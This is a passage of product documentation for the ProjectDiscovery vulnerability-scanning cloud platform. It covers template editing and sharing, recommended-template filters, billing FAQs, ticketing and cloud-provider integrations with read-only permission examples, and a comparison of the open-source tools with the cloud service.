1. Log in to your account at [https://cloud.projectdiscovery.io](https://cloud.projectdiscovery.io).
2. Click on the "**Create new template**" button to open up a fresh editor.
3. Write and modify your template. The editor includes tools like syntax highlighting, snippet suggestions, and other features to simplify the process.
4. After writing your template, input your testing target and click the "**Scan**" button to validate your template's accuracy.
# Recommended
Source: https://docs.projectdiscovery.io/cloud/editor/recommended
Learn more about using recommended templates with ProjectDiscovery
The functionality described on this page is **only** available on
[ProjectDiscovery team account](https://projectdiscovery.io/pricing).
## Overview
When setting up a scan in our cloud platform you have the option to build your scan using custom templates, [all templates](https://github.com/projectdiscovery/nuclei-templates), or recommended templates.
**Recommended templates are a curated subset of the full template library designed for efficiently scanning your attack surface.**
This subset of templates, nearly 4000 in total, focuses on relevant and exploitable vulnerabilities, excluding informational templates and templates with the potential to generate false positives.
The curated set of recommended templates is available as a config file in the Nuclei templates repository ([recommended templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/config/recommended.yml)) or within the application.
Rather than a list, recommended templates are curated through defined filters.
*This approach ensures that the curated list remains up-to-date as new templates are added.*
Filtering for recommended templates includes:
* All template severities except info
* Type: http, tcp, or javascript
* Exclusion of the tags: tech, dos, fuzz, creds-stuffing, token-spray, osint
* Exclusion of specific templates; the excluded template list is available for review in the [recommended templates config](https://github.com/projectdiscovery/nuclei-templates/blob/main/config/recommended.yml) (see the config sketch after this list)
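The filters above correspond roughly to a config file along the following lines. This is an illustrative sketch only; the key names mirror Nuclei's CLI flag names and may differ from the maintained [recommended.yml](https://github.com/projectdiscovery/nuclei-templates/blob/main/config/recommended.yml), which remains the authoritative version.

```yaml
# Illustrative approximation of the recommended-template filters.
# Key names mirror Nuclei CLI flags; see the maintained recommended.yml
# for the authoritative configuration.
severity:
  - critical
  - high
  - medium
  - low
  - unknown
type:
  - http
  - tcp
  - javascript
exclude-tags:
  - tech
  - dos
  - fuzz
  - creds-stuffing
  - token-spray
  - osint
```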
If you have questions, reach out to us through [support@projectdiscovery.io](mailto:support@projectdiscovery.io).
# Template Sharing
Source: https://docs.projectdiscovery.io/cloud/editor/share
Learn about sharing templates
The Template Editor offers the ability to share any public templates, including the ones you create.
To share a template, click on the "Share" button to generate a link that can be sent to others.
## How to Share Public Templates
Public templates are designed for ease of sharing. You don't need to be authenticated to share them, meaning there's no need to log in. These templates are mapped with their Template ID, following a static URL pattern. For instance, a public template URL might resemble this: [https://cloud.projectdiscovery.io/public/CVE-2023-35078](https://cloud.projectdiscovery.io/public/CVE-2023-35078). In the given URL, `CVE-2023-35078` is the Template ID representing the template in the [nuclei-templates](https://github.com/projectdiscovery/nuclei-templates) project.
## How to Share User Templates
User templates, unlike public templates, require authentication for sharing. These templates are assigned a unique, UUID-based ID, similar to YouTube's unlisted video URLs. This means anyone with the shared URL will be able to access the template.
## Revoking Access to Shared Templates
If at any point you want to limit the access to the shared template, it is as simple as changing the visibility of the template to private. After this change, the originally shared link will become inactive. However, you have the flexibility to share it again, which would generate a new unique ID.
Please remember, while sharing is easy, it's important to distribute the URL cautiously as the link allows full access to the shared template.
# Editor Keyboard Shortcuts
Source: https://docs.projectdiscovery.io/cloud/editor/shortcuts
Review keyboard shortcuts for Nuclei templates
The Template Editor is equipped with keyboard shortcuts to make it more efficient. You can use these shortcuts whether you're creating a new template or optimizing an existing one, enabling quicker actions without interfering with your workflow.
Here is a list of the actions, along with their corresponding shortcut keys and descriptions:
| **Action** | **Shortcut Key** | **Description** |
| --------------------- | ----------------------- | ------------------------------------------------------------ |
| Save Template | **CMD + S** | Saves the current template. |
| Duplicate Template | **CMD + D** | Creates a copy of a public template. |
| Execute Template | **CMD + SHIFT + SPACE** | Run a scan with the current template. |
| Share Template Link | **ALT + SHIFT + SPACE** | Generates a URL for sharing the current template. |
| Search Templates | **CMD + K** | Searches within your own templates. |
| Copy Template | **CMD + SHIFT + C** | Copies the selected template to your clipboard. |
| Show/Hide Side Bar | **CMD + B** | Toggles the visibility of the side bar. |
| Show/Hide Debug Panel | **CMD + SHIFT + M** | Toggles the visibility of the debug panel for extra insight. |
For Mac users, the CMD key is used for these shortcuts.
Non-Mac users (Windows and Linux) should use the CTRL key instead.
# Frequently Asked Questions
Source: https://docs.projectdiscovery.io/cloud/general-faq
## General
You can find our [terms of use](https://projectdiscovery.io/terms) here.
ProjectDiscovery is engineered for security and DevOps teams. Please include scan headers, whitelist your scan activities with your IT team, and limit scanning to authorized assets.
If you have questions, don't hesitate to reach out - [support@projectdiscovery.io](mailto:support@projectdiscovery.io)!
*Note: Unauthorized scans that lead to abuse reports will result in account suspension.*
ProjectDiscovery works best on Chromium-based browsers.
If you can't find what you need in our documentation - [email us](mailto:support@projectdiscovery.io), we're here to help!
Yes, with a Pro subscription you can have up to 10 team members. If you need support for a larger team, [get in touch](mailto:sales@projectdiscovery.io) and we'll be happy to talk about a custom setup.
ProjectDiscovery treats all vulnerability data and custom templates as private customer data. We do not share or sell this data and maintain strict protocols internally to limit access to your data.
This also applies to any information entered into our [AI template editor](/cloud/editor/overview). We are SOC 2 compliant and our latest security reports can be requested from our Trust Center at security.projectdiscovery.io.
ProjectDiscovery data resides with our cloud infrastructure partners. We maintain several relationships with leading global cloud providers.
We are SOC 2 compliant and our latest security reports can be requested from our Trust Center at security.projectdiscovery.io.
We are working on an on-prem version of our cloud platform. Get in touch with us at [sales@projectdiscovery.io](mailto:sales@projectdiscovery.io) to share more about your requirements and learn about our product roadmap for upcoming features.
## Pricing
Our Pro plan enables users to scan up to 1,000 unique assets per month. If you need higher scanning capacity for your workflows, please contact us at [sales@projectdiscovery.io](mailto:sales@projectdiscovery.io).
A unique asset is a combination of host (subdomain or IP) and port. Once scanned, you can rescan any asset again without extra cost for the rest of the month.
Once you reach your limit, you will not be able to scan additional unique assets until your limits reset at the start of the next billing month.
You will be notified prior to running a scan if your scan exceeds the remaining count of unique assets in your billing month. You will have the option of proceeding with that scan and we will scan as many new unique assets as possible up to your limit.
You can also reconfigure your scan with fewer assets by applying filters to an asset group and clicking on “Start Vulnerability Scan” or deleting assets from an asset group by scrolling to the right and clicking on the kebab menu and “Delete”.
If you need higher scanning capacity for your workflows, please contact us at [sales@projectdiscovery.io](mailto:sales@projectdiscovery.io).
For new users, visit [https://cloud.projectdiscovery.io/](https://cloud.projectdiscovery.io/) to sign up.
For existing users, visit **Settings –> Billing** to set up your subscription.
Changes to subscriptions are available in the Billing section of the Settings
page. If you are the team owner, you will also be able to view past invoices
under the Billing section of the Settings page.
You can cancel in the Billing section of the Settings page at any time.
Unfortunately, we do not offer full or partial refunds. If you have issues or
questions, contact
[support@projectdiscovery.io](mailto:support@projectdiscovery.io) and we will
do our best to help you out.
Our primary payment method is via credit card invoiced in USD. For ACH payments or other custom payment requirements, please reach out to [sales@projectdiscovery.io](mailto:sales@projectdiscovery.io).
## Other FAQs
Are you looking for details about certain features? Check out our feature-specific FAQs for additional details.
* [Assets FAQ](/cloud/assets/overview)
* [Scanning FAQ](/cloud/scanning/overview)
* [Nuclei Templates FAQ](/cloud/editor/faq)
Questions about the product that you don't see covered here - we want to know!
Contact [support@projectdiscovery.io](mailto:support@projectdiscovery.io) with any recommendations or issues.
# Platform Integrations
Source: https://docs.projectdiscovery.io/cloud/integrations
Technical guide for configuring third-party integrations for cloud assets, vulnerability scanning, alerts, and ticketing
## Summary
ProjectDiscovery supports various third-party integrations to enhance your security workflow. These integrations enable:
* Cloud asset discovery and management
* Real-time alerting through communication platforms
* Automated vulnerability tracking through ticketing systems
* Custom webhook integrations for workflow automation
Configure your integrations through the [Configurations](https://cloud.projectdiscovery.io/configs) interface.
## Notification Integrations
Alerting integrations support notifications as part of scanning and include Slack, Microsoft Teams, Email, and custom Webhooks. Navigate to [Scans → Configurations → Alerting](https://cloud.projectdiscovery.io/scans/configs) to configure your alerts.
### Slack
ProjectDiscovery supports scan notifications through Slack. To enable Slack notifications, provide a name for your Configuration, a webhook, and an optional username.
Choose from the list of **Events** (Scan Started, Scan Finished, Scan Failed) to specify which notifications are generated. All Events are selected by default.
* Refer to Slack's [documentation on creating webhooks](https://api.slack.com/messaging/webhooks) for configuration details.
### MS Teams
ProjectDiscovery supports notifications through Microsoft Teams. To enable notifications, provide a name for your Configuration and a corresponding webhook.
Choose from the list of **Events** (Scan Started, Scan Finished, Scan Failed) to specify what notifications are generated.
* Refer to [Microsoft's documentation on creating webhooks](https://learn.microsoft.com/en-us/microsoftteams/platform/webhooks-and-connectors/how-to/add-incoming-webhook?tabs=newteams%2Cdotnet) for configuration details.
### Email
ProjectDiscovery supports notifications via Email. To enable email notifications for completed scans simply add your recipient email addresses.
### Webhook
ProjectDiscovery supports custom webhook notifications, allowing you to post events to any HTTP endpoint that matches your infrastructure requirements.
To implement webhook notifications, provide:
* Configuration name
* Webhook URL
* Authentication parameters (if required)
Example endpoint format:
```
https://your-domain.com/api/security/alerts
```
## Ticketing Integrations
The integrations under Ticketing support ticketing functionality as part of scanning and include support for Jira, GitHub, GitLab, and Linear. Navigate to [Scans → Configurations → Ticketing](https://cloud.projectdiscovery.io/scans/configs?type=reporting) to configure your ticketing tools.
### Jira
ProjectDiscovery provides integration support for Jira to create new tickets when vulnerabilities are found.
Provide a name for the configuration, the Jira instance URL, the Account ID, the Email, and the associated API token.
Details on creating an API token are available [in the Jira documentation here.](https://support.atlassian.com/atlassian-account/docs/manage-api-tokens-for-your-atlassian-account/)
### GitHub
ProjectDiscovery provides integration support for GitHub to create new tickets when vulnerabilities are found.
Provide a name for the configuration, the Organization or username, Project name, Issue Assignee, Token, and Issue Label. The Issue Label determines when a ticket is created. (For example, if critical severity is selected, any issues with a critical severity will create a ticket.)
* The severity as label option adds a template result severity to any GitHub issues created.
* Deduplicate posts any new results as comments on existing issues instead of creating new issues for the same result.
Details on setting up access in GitHub [are available here.](https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/managing-your-personal-access-tokens)
### GitLab
ProjectDiscovery provides integration support for GitLab to create new tickets when vulnerabilities are found.
Provide your GitLab username, Project name, Project Access Token and a GitLab Issue label. The Issue Label determines when a ticket is created.
(For example, if critical severity is selected, any issues with a critical severity will create a ticket.)
* The severity as label option adds a template result severity to any GitLab issues created.
* Deduplicate posts any new results as comments on existing issues instead of creating new issues for the same result.
Refer to GitLab's documentation for details on [configuring a Project Access token.](https://docs.gitlab.com/ee/user/project/settings/project_access_tokens.html#create-a-project-access-token)
### Linear
ProjectDiscovery integrates with Linear for automated issue tracking. The integration requires the following API parameters:
1. Linear API Key
2. Linear Team ID
3. Linear Open State ID
To retrieve these parameters:
1. **API Key Generation**:
* Path: Linear > Settings > API > Personal API keys
* Direct URL: linear.app/[workspace]/settings/api
2. **Team ID Retrieval**:
```graphql
query {
teams {
nodes {
id
name
}
}
}
```
3. **Open State ID Retrieval**:
```graphql
query {
workflowStates {
nodes {
id
name
}
}
}
```
For detailed API documentation, refer to the [Linear API Documentation](https://developers.linear.app/docs/graphql/working-with-the-graphql-api).
## Cloud Asset Discovery
ProjectDiscovery leverages our open-source [Cloudlist](https://github.com/projectdiscovery/cloudlist) technology to provide comprehensive cloud asset discovery and management through a simple web interface.
### Major Cloud Services
#### AWS (Amazon Web Services)
Supported AWS Services:
* [EC2](https://aws.amazon.com/ec2/)
* [Route53](https://aws.amazon.com/route53/)
* [S3](https://aws.amazon.com/s3/)
* [Cloudfront](https://aws.amazon.com/cloudfront/)
* [ECS](https://aws.amazon.com/ecs/)
* [EKS](https://aws.amazon.com/eks/)
* [ELB](https://aws.amazon.com/elasticloadbalancing/)
* [ELBv2](https://aws.amazon.com/elasticloadbalancing/)
* [Lambda](https://aws.amazon.com/lambda/)
* [Lightsail](https://aws.amazon.com/lightsail/)
* [Apigateway](https://aws.amazon.com/api-gateway/)
**Example Config**:
Amazon Web Services can be integrated by using the following configuration block.
```yaml
- provider: aws # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# aws_access_key is the access key for AWS account
aws_access_key: $AWS_ACCESS_KEY
# aws_secret_key is the secret key for AWS account
aws_secret_key: $AWS_SECRET_KEY
# aws_session_token session token for temporary security credentials retrieved via STS (optional)
aws_session_token: $AWS_SESSION_TOKEN
# assume_role_name is the name of the role to assume (optional)
assume_role_name: $AWS_ASSUME_ROLE_NAME
# account_ids is the aws account ids which has similar assumed role name (optional)
account_ids:
- $AWS_ACCOUNT_ID_1
- $AWS_ACCOUNT_ID_2
```
`aws_access_key` and `aws_secret_key` can be generated in the IAM console. We recommend creating a new IAM user with `Read Only` permissions and providing the access token for the user.
Scopes Required:
The following scopes can directly be provided to the IAM user.
```
EC2 - AmazonEC2ReadOnlyAccess
Route53 - AmazonRoute53ReadOnlyAccess
S3 - AmazonS3ReadOnlyAccess
Lambda - AWSLambda_ReadOnlyAccess
ELB - ElasticLoadBalancingReadOnly
Cloudfront - CloudFrontReadOnlyAccess
```
To support the other services as well, the following custom policy document can be copied directly into the IAM role or user policy to grant the correct, minimal permissions.
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "RequiredReadPermissions",
"Effect": "Allow",
"Action": [
"ec2:DescribeInstances",
"ec2:DescribeRegions",
"route53:ListHostedZones",
"route53:ListResourceRecordSets",
"s3:ListAllMyBuckets",
"lambda:ListFunctions",
"elasticloadbalancing:DescribeLoadBalancers",
"elasticloadbalancing:DescribeTargetGroups",
"elasticloadbalancing:DescribeTargetHealth",
"cloudfront:ListDistributions",
"ecs:ListClusters",
"ecs:ListServices",
"ecs:ListTasks",
"ecs:DescribeTasks",
"ecs:DescribeContainerInstances",
"eks:ListClusters",
"eks:DescribeCluster",
"apigateway:GET",
"lightsail:GetInstances",
"lightsail:GetRegions"
],
"Resource": "*"
}
]
}
```
**References:**
1. [https://docs.aws.amazon.com/IAM/latest/UserGuide/reference\_policies\_examples\_iam\_read-only-console.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_examples_iam_read-only-console.html)
2. [https://docs.aws.amazon.com/IAM/latest/UserGuide/id\_credentials\_access-keys.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_access-keys.html)
3. [https://docs.aws.amazon.com/IAM/latest/UserGuide/id\_credentials\_temp\_request.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html)
* AWS Assume Role:
* [https://docs.aws.amazon.com/sdkref/latest/guide/feature-assume-role-credentials.html](https://docs.aws.amazon.com/sdkref/latest/guide/feature-assume-role-credentials.html)
* [https://docs.logrhythm.com/OCbeats/docs/aws-cross-account-access-using-sts-assume-role](https://docs.logrhythm.com/OCbeats/docs/aws-cross-account-access-using-sts-assume-role)
#### Google Cloud Platform (GCP)
Supported GCP Services:
* [Cloud DNS](https://cloud.google.com/dns)
* [Kubernetes Engine](https://cloud.google.com/kubernetes-engine)
* [Compute Engine](https://cloud.google.com/products/compute)
* [Bucket](https://cloud.google.com/storage)
* [Cloud Functions](https://cloud.google.com/functions)
* [Cloud Run](https://cloud.google.com/run)
**Example Config:**
Google Cloud Platform can be integrated by using the following configuration block.
```yaml
- provider: gcp # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: logs
# gcp_service_account_key is the minified json of a google cloud service account with list permissions
gcp_service_account_key: '{xxxxxxxxxxxxx}'
```
`gcp_service_account_key` can be retrieved by creating a new service account. To do so, create a service account with Read Only access to the `cloudresourcemanager` and `dns` scopes in IAM. Next, generate a new account key for the service account; this produces a JSON file whose contents can be pasted as a single line into `gcp_service_account_key`.
Scopes Required: Cloud DNS, GKE
References:
1. [https://cloud.google.com/iam/docs/service-account-overview](https://cloud.google.com/iam/docs/service-account-overview)
#### Azure
Supported Azure Services:
* Virtual Machines
**Example Config:**
Microsoft Azure can be integrated by using the following configuration block.
```yaml
- provider: azure # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# client_id is the client ID of the registered application of the azure account (not required if using cli auth)
client_id: $AZURE_CLIENT_ID
# client_secret is the secret ID of the registered application of the azure account (not required if using cli auth)
client_secret: $AZURE_CLIENT_SECRET
# tenant_id is the tenant ID of the registered application of the azure account (not required if using cli auth)
tenant_id: $AZURE_TENANT_ID
#subscription_id is the azure subscription id
subscription_id: $AZURE_SUBSCRIPTION_ID
#use_cli_auth if set to true cloudlist will use azure cli auth
use_cli_auth: true
```
`tenant_id`, `client_id`, and `client_secret` can be obtained or generated from `All services` > `Azure Active Directory` > `App registrations`.
`subscription_id` can be retrieved from `All services` > `Subscriptions`.
To use CLI auth, set `use_cli_auth` to `true` and run `az login` in the terminal.
References:
1. [https://docs.microsoft.com/en-us/cli/azure/create-an-azure-service-principal-azure-cli](https://docs.microsoft.com/en-us/cli/azure/create-an-azure-service-principal-azure-cli)
2. [https://docs.microsoft.com/en-us/cli/azure/ad/sp?view=azure-cli-latest#az\_ad\_sp\_create\_for\_rbac](https://docs.microsoft.com/en-us/cli/azure/ad/sp?view=azure-cli-latest#az_ad_sp_create_for_rbac)
3. [https://docs.microsoft.com/en-us/cli/azure/authenticate-azure-cli](https://docs.microsoft.com/en-us/cli/azure/authenticate-azure-cli)
#### Alibaba Cloud
Supported Alibaba Cloud Services:
* ECS Instances
**Example Config:**
Alibaba Cloud can be integrated by using the following configuration block.
```yaml
- provider: alibaba # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# alibaba_region_id is the region id of the resources
alibaba_region_id: $ALIBABA_REGION_ID
# alibaba_access_key is the access key ID for alibaba cloud account
alibaba_access_key: $ALIBABA_ACCESS_KEY
# alibaba_access_key_secret is the secret access key for alibaba cloud account
alibaba_access_key_secret: $ALIBABA_ACCESS_KEY_SECRET
```
Alibaba Cloud Access Key ID and Secret can be created by visiting [https://ram.console.aliyun.com/manage/ak](https://ram.console.aliyun.com/manage/ak)
References:
1. [https://www.alibabacloud.com/help/faq-detail/142101.htm](https://www.alibabacloud.com/help/faq-detail/142101.htm)
2. [https://www.alibabacloud.com/help/doc-detail/53045.htm](https://www.alibabacloud.com/help/doc-detail/53045.htm)
### Infrastructure & Platform Services
#### Kubernetes
Support for:
* Services
* Ingresses
* Cross-cloud cluster discovery
Navigate to [Assets → Connect Cloud Services → Kubernetes](https://cloud.projectdiscovery.io/assets/configure) to configure your cluster access.
#### Hashicorp Stack
Support for:
* Terraform state file parsing
* Nomad services
* Consul services
### CDN & DNS Providers
Configure these providers through [Assets → Connect Cloud Services](https://cloud.projectdiscovery.io/assets/configure):
* **Cloudflare**: DNS and CDN assets
* **Fastly**: CDN endpoints
* **Namecheap**: Domain management
### VPS & PaaS Providers
Access these providers through [Assets → Connect Cloud Services](https://cloud.projectdiscovery.io/assets/configure):
* **DigitalOcean**: Droplets and managed services
* **Scaleway**: Instances and managed services
* **Heroku**: Applications and add-ons
* **Linode**: Compute instances
* **Hetzner Cloud**: Cloud servers
# Introducing ProjectDiscovery
Source: https://docs.projectdiscovery.io/cloud/introduction
Sign up for our [cloud platform](https://cloud.projectdiscovery.io/) for free.
Have a complex company use case? Get [Enterprise grade assistance](https://projectdiscovery.io/request-demo)
ProjectDiscovery is a continuous security monitoring platform that helps teams proactively find and fix critical exposures in their external infrastructure. It blends professional-grade vulnerability management with an easy-to-use, open-source powered approach. Below is an overview of its key capabilities:
**Continuous Asset Monitoring**
* Continuously monitors all internet-exposed assets and services in your infrastructure, automatically discovering new hosts, endpoints, and changes in your attack surface
* Ensures you have up-to-date visibility into what's publicly accessible at any given time
**Open-Source Integrations**
* Leverages a suite of battle-tested open-source security tools (e.g. Nuclei, httpx, dnsx) to scan your environment at scale
* By integrating these community-driven tools, ProjectDiscovery helps uncover unknown exposures and misconfigurations that traditional scanners might miss, keeping your team one step ahead of threats
**Realistic Attack Simulation**
* Identifies and validates vulnerabilities with high accuracy by safely simulating real-world attack methods in a controlled environment
* Every finding is verified with a proof-of-concept exploit, drastically reducing false positives compared to basic version-based scanners
* In practice, this means you only get alerts for issues that are truly exploitable, saving time on triage
**Customizable Detection Rules**
* Provides a flexible, YAML-based framework that lets you define your own vulnerability detection rules and workflows
* Teams can codify insights from penetration tests or bug bounty reports into custom scan templates, automating the detection of those specific scenarios across their systems
* This customization empowers organizations to adapt the platform to their unique environment and security knowledge
**Community-Powered Updates**
* Stays in sync with the latest threats via a real-time community feed of new vulnerability templates and attack techniques
* ProjectDiscovery's global user community continuously contributes and updates these detection templates (for trending exploits, emerging CVEs, etc.)
* Ensures you're quickly alerted to new attack vectors as soon as they arise
**Attacker's Perspective**
* Unlike traditional vulnerability scanners that rely solely on known CVE databases and version checks, ProjectDiscovery approaches security from an attacker's point of view
* Zeroes in on vulnerabilities that are actually exploitable in real-world conditions – the weaknesses attackers would target
* Helps your team prioritize fixing the issues that matter most
Each of these capabilities works together to give security teams and developers an accurate, noise-free view of their true security risks. By focusing on what attackers can really exploit (rather than just matching CVEs), ProjectDiscovery helps organizations address the most critical vulnerabilities first, with confidence and speed.
## Getting Started
Ready to secure your infrastructure? Here's how to begin:
* [Create a free account](https://cloud.projectdiscovery.io)
* [Explore our documentation](/cloud/assets/overview)
* [Join our Discord community](https://discord.com/invite/projectdiscovery)
# From Open Source to Cloud Platform
Source: https://docs.projectdiscovery.io/cloud/ossvscloud
ProjectDiscovery's journey from open source to a cloud platform is grounded in a commitment to community-driven security and enhanced organizational capabilities. **ProjectDiscovery began as an open-source toolkit**, embraced by over 100,000 security professionals worldwide. These tools thrive on community-driven innovation – for example, users contribute new vulnerability templates to quickly detect emerging threats. We also offer advanced customization, like the ability to write custom scan templates and integrate with scripts, giving security engineers flexibility in how they hunt for issues. However, as usage grows within a company, teams often encounter challenges with **scale, consistency, and maintenance** that individual open-source tools alone may not easily solve. The **ProjectDiscovery Cloud Platform** was built to address these challenges by transforming our battle-tested open-source tools into a comprehensive, managed solution. It retains the transparency and flexibility that the community loves, while streamlining workflows, increasing speed, and adding enterprise-grade features to meet the needs of security and engineering teams at scale. Below, we outline the key benefits and features that the cloud platform brings, and how it complements our open-source tools.
## Cloud Platform Benefits
Moving to the cloud platform **streamlines security workflows** and offloads the operational burden from your team. Instead of running scans on local infrastructure and managing updates manually, you can leverage a high-performance cloud environment purpose-built for security scanning. Key benefits include:
* **No Infrastructure to Manage:** The cloud platform eliminates the need to deploy, configure, and maintain your own scanning servers or VMs. All scanning infrastructure is hosted and managed by ProjectDiscovery, meaning no installation headaches or ongoing server upkeep on your side (zero maintenance overhead). This frees your team to focus on findings and fixes rather than ops tasks.
* **Blazing-Fast, Scalable Scanning:** ProjectDiscovery's cloud orchestrates scans across a distributed network of machines, enabling massively parallel execution. This design delivers vulnerability scanning up to **50× faster than typical self-hosted deployments**. Large asset inventories that might take hours or days to scan with local tools can be covered in minutes on the cloud. High throughput scanning becomes the norm, allowing you to continuously assess thousands of assets without waiting.
* **Centralized Results (Single Source of Truth):** All scan findings and asset data are consolidated in one cloud-based dashboard. By maintaining a **single source of truth for all security discoveries across your organization**, the platform makes it easy to track issues from discovery to resolution. Teams no longer deal with scattered scan outputs or multiple databases – everything is in one place, searchable and correlated, which simplifies analysis and reporting.
* **Always Up-to-Date Checks:** The cloud platform stays in sync with the latest threat intelligence. Vulnerability signatures and detection templates are updated in real-time by ProjectDiscovery's research team and the global community. The moment a new CVE or exploit technique emerges, a template can be added and instantly made available for your scans. Your security tests are always using the most current knowledge base without you manually pulling updates from GitHub or managing template files.
* **Fixed Scan IPs for Easy Whitelisting:** All cloud-initiated scans originate from a fixed set of IP addresses provided by ProjectDiscovery. This makes it simple to whitelist the scanner in your target environments' firewalls and IPS. Unlike running scans from ever-changing IPs or developer machines, you know exactly what source addresses our cloud will use. You can define custom rate limits or access rules for these scanners, ensuring high-speed scans don't trigger defensive blocks. This **predictable IP range** is especially useful when scanning internal assets or third-party services that require pre-approval of scanner IPs.
## Enterprise-Grade Features
Beyond raw speed and convenience, the ProjectDiscovery Cloud Platform includes **enterprise-grade features** that help manage security efforts across large teams and complex environments. It's designed to provide the visibility, control, and integrations that organizations need for a mature security program:
* **Centralized Security Visibility:** The platform provides a unified dashboard that displays all vulnerabilities and assets discovered across your organization in real time. This **central visibility** means security leads and engineers share the same up-to-date view of the attack surface and can prioritize issues together. Instead of siloed scan reports, everyone sees findings in one place – improving situational awareness and facilitating data-driven decisions. Graphs, search filters, and trend views let you quickly assess your security posture or drill down into specific asset groups.
* **Team Collaboration and Workspaces:** ProjectDiscovery Cloud is built for teams. You can organize assets and scans into shared workspaces so multiple team members can contribute without stepping on each other's toes. The platform enables collaborative workflows – for example, one team member can configure a scan, another can review the results, and a third can validate a finding – all within the same interface. By **uniting security teams through shared workspaces and collaborative processes**, the cloud platform ensures everyone stays in sync. Findings can be commented on and tagged, facilitating knowledge sharing across AppSec, DevOps, and engineering groups.
* **Granular Access Control (RBAC):** With role-based access control, you can tightly manage who on your team can view data or perform certain actions. The platform lets you define roles (e.g., admin, security engineer, read-only analyst) and assign permissions accordingly. For instance, you might allow an engineering team to see and fix vulnerabilities in their projects, while restricting administrative settings to the security team leads. This granular access control ensures sensitive information is only accessible to the right people and supports separation-of-duties practices. As a result, large organizations can onboard many users while maintaining governance over what each user or team can do.
* **Single Sign-On and Audit Logging:** ProjectDiscovery Cloud integrates with enterprise Single Sign-On (SSO) providers like Okta, Azure AD (Entra ID), and Google Workspace for streamlined and secure authentication. Your team can use existing corporate logins to access the platform, simplifying user management and enforcing company login policies (such as 2FA). Additionally, every action on the platform is tracked with comprehensive **audit logs**. You can review who ran a scan, who acknowledged a vulnerability, or who changed a setting, along with timestamps. These logs help meet compliance requirements and provide accountability, making it easier to pass security audits or investigate incidents.
* **Compliance Reporting:** Generating reports for executives or compliance frameworks is built into the platform. With a few clicks, you can produce reports tailored to standards like **SOC 2, PCI-DSS, HIPAA** and others. The reports compile relevant findings, trends, and metrics to demonstrate your security posture over time. This saves significant effort for security teams who typically would manually assemble data for auditors or management. The cloud platform ensures that the data in these reports is up-to-date and pulled from that single source of truth, reducing errors and omissions. Having on-demand executive and compliance reports readily available helps translate technical findings into business terms and proof of due diligence.
* **Automated Vulnerability Regression Testing:** When vulnerabilities are found and fixed, the work isn't over – you need to ensure those issues stay fixed. The cloud platform can automatically **re-scan and retest known vulnerabilities** on a schedule or upon deployment of a fix. This regression testing workflow means if a previously patched issue reappears (due to a code change, configuration drift, etc.), you'll catch it immediately. It creates a safety net that continuously validates your remediation efforts. Instead of relying on memory or tickets to revisit old findings, the platform's automation verifies them for you and alerts if something that was safe becomes vulnerable again. This feature gives teams confidence that improvements are lasting and helps prevent regressions from slipping through.
* **Dedicated Scanning IPs and Control:** (Enterprise Feature) As mentioned earlier, the cloud provides fixed scanning IP addresses. In an enterprise context, this is critical for complying with internal security policies. You can formally register or whitelist the ProjectDiscovery scanner IPs in advance, satisfying any approval processes before testing. Moreover, you can enforce custom rate limits or scanning hours to avoid network saturation in sensitive environments. Having **dedicated, known scanner IPs** and the ability to control their behavior makes the cloud platform play nicely within corporate network rules, unlike unmanaged open-source scans that might inadvertently trigger alarms.
* **Enterprise Support and Scale:** For organizations that need it, ProjectDiscovery offers enterprise support plans with dedicated assistance, SLAs, and onboarding help. The platform is also built to handle **enterprise scale** – from discovering assets across multiple cloud providers to mapping out subsidiaries and business units. You can monitor a large, dynamic attack surface without worrying about hitting tool limits. Whether you have 100 or 100,000 assets to assess, the cloud backend can scale to meet the demand, leveraging cloud resources to maintain performance. This ensures that as your organization (and asset inventory) grows, your security scanning can grow with it seamlessly.
## Open-Source Integration and Flexibility
Adopting the cloud platform doesn't mean abandoning the open-source tools your team knows and loves. In fact, the two work hand-in-hand. We recognize that **security teams value the flexibility of open-source**, from crafting custom detection logic to integrating tools into bespoke workflows. ProjectDiscovery Cloud is designed to complement and enhance your use of open-source tools, allowing you to continue leveraging them where it makes sense while benefiting from cloud capabilities. Here's how the platform integrates with open-source usage:
* **Use Existing CLI Tools with Cloud:** If you have existing scripts or pipelines built around ProjectDiscovery's CLI tools (such as Nuclei, Subfinder, httpx, etc.), you can plug them into the cloud via our API. The platform provides a robust API and SDKs that let you programmatically trigger cloud scans, fetch results, and manage assets. In practice, this means you can **connect your current automation with our cloud APIs** without a complete rewrite. For example, a CI/CD pipeline running daily scans can call the cloud to perform the scan and retrieve findings, blending into your established processes.
* **Custom Templates Across Environments:** One of the strengths of ProjectDiscovery tools is the ability to write custom vulnerability templates (e.g., Nuclei YAML templates) for your specific needs. The cloud platform fully supports this customization. You can upload and use your **custom templates on the cloud just as you do locally**. Templates you've developed in-house can be synced to the cloud scanner, ensuring that proprietary checks (for your app, environment, or policy requirements) run at scale. There's no lock-in to only built-in templates – you maintain the freedom to tailor scanning to your unique context, with the cloud handling the heavy lifting to run those checks on many targets.
* **Unified Data from Open-Source and Cloud Scans:** Whether a scan is run locally or in the cloud, you can bring the results together. The platform is able to **aggregate findings from both cloud and local scans into one unified view**. This means if certain sensitive scans must be done on-premises with open-source tools (for example, inside a restricted network), those results can be imported or correlated with your cloud findings. Your team gets a holistic picture of vulnerabilities without needing to manually merge reports. In short, the cloud platform becomes the central repository for all your ProjectDiscovery tool outputs, regardless of where they ran.
* **Flexible Deployment Strategies:** With the combination of open-source and cloud, you can adopt a hybrid scanning strategy. The cloud platform allows you to **choose where to run specific security checks** – some can run in the cloud for speed and scale, while others run locally for special cases. For instance, you might run external-facing asset scans on the cloud (to leverage its scale and fixed IPs), but execute internal network scans with the open-source tools on an on-prem machine that has the necessary network access. Both sets of results flow into the platform. This flexibility ensures you're not constrained by one approach; you use the best tool for the job, and ProjectDiscovery ties it all together. The open-source tools remain an integral part of your workflow, and the cloud platform enhances them with a centralized, automated touch.
## Performance and Scale
One of the most compelling reasons to use the cloud platform is the **dramatic boost in scanning performance and the ability to scale to very large environments** effortlessly. ProjectDiscovery Cloud's architecture and optimizations solve many limitations of self-hosted scanning:
